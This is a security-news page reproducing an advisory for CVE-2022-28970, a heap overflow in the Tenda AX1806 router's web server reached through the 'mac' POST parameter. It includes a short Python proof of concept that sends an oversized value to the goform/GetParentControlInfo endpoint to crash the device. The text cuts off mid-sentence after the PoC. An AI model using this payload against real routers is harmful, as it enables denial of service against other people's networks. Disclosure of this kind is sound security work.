Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-28970: IoT-vuln/readme.md at main · d1tto/IoT-vuln

Tenda AX1806 v1.0.0.1 was discovered to contain a heap overflow via the mac parameter in the function GetParentControlInfo. This vulnerability allows attackers to cause a Denial of Service (DoS).

CVE
#vulnerability#web#mac#dos

Permalink

Tenda AX1806 GetParentControlInfo function heap overflow****Overview

  • The device’s official website: https://www.tenda.com.cn/product/AX1806.html
  • Firmware download website: https://www.tenda.com.cn/download/detail-3306.html

Affected version

v1.0.0.1

Vulnerability details

/bin/tdhttpd has a heap overflow vulnerability.The vulnerability exists in GetParentControlInfo function, we can through the URL goform/GetParentControlInfo access to it.

The function takes the POST parameter mac, does not verify its length, and copies it directly to the heap memory, resulting in a heap overflow.

PoC

Poc of Denial of Service(DoS)

import requests

data = { b"mac": b"A"*0x400 } res = requests.post("http://127.0.0.1/goform/GetParentControlInfo", data=data) print(res.content)

I use qemu-user to emulate it. When I run the POC script, I can see

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda